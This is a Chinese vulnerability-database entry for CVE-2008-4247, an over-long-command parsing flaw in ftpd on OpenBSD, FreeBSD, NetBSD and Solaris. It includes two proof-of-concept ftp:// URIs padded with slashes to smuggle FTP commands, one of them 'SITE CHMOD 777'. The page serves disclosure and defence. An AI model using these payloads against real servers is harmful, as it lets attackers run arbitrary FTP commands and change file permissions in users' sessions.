OpenBSD ftpd超长命令处理跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116152 漏洞类型 跨站请求伪造
发布时间 2008-09-20 更新时间 2009-01-29
CVE编号 CVE-2008-4247 CNNVD-ID CNNVD-200809-361
漏洞平台 Unix CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/32399
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-361
|漏洞详情
OpenBSD4.3,FreeBSD7.0,NetBSD4.0,Solaris及其他操作系统的ftpd在处理超长的FTP请求时while()循环和fgets()函数错误的将剩余部分的字符串解释为FTP命令。远程攻击者可借助超长的ftp://URI执行跨站请求伪造攻击并执行任意FTP命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/31289/info

FTP servers by multiple vendors are prone to a security vulnerability that allows attackers to perform cross-site request-forgery attacks.

Successful exploits can run arbitrary FTP commands on the server in the context of an unsuspecting user's session. This may lead to further attacks. 

ftp://user@example.com////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////syst

ftp://ftp.example.com/////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE
|参考资料

来源:SECTRACK
名称:1021112
链接:http://www.securitytracker.com/id?1021112
来源:SECTRACK
名称:1020946
链接:http://www.securitytracker.com/id?1020946
来源:www.openbsd.org
链接:http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c.diff?r1=1.183&r2=1.184&f=h
来源:www.openbsd.org
链接:http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c
来源:www.openbsd.org
链接:http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y.diff?r1=1.51&r2=1.52&f=h
来源:www.openbsd.org
链接:http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y
来源:SREASON
名称:4313
链接:http://securityreason.com/securityalert/4313
来源:SREASONRES
名称:20080926multiplevendorftpd-Cross-siterequestforgery
链接:http://securityreason.com/achievement_securityalert/56
来源:FREEBSD
名称:FreeBSD-SA-08:12
链接:http://security.FreeBSD.org/advisories/FreeBSD-SA-08:12.ftpd.asc
来源:SECUNIA
名称:33341
链接:http://secunia.com/advisories/33341
来源:SECUNIA
名称:32070
链接:http://secunia.com/advisories/32070
来源:SECUNIA
名称:32068
链接:http://secunia.com/advisories/32068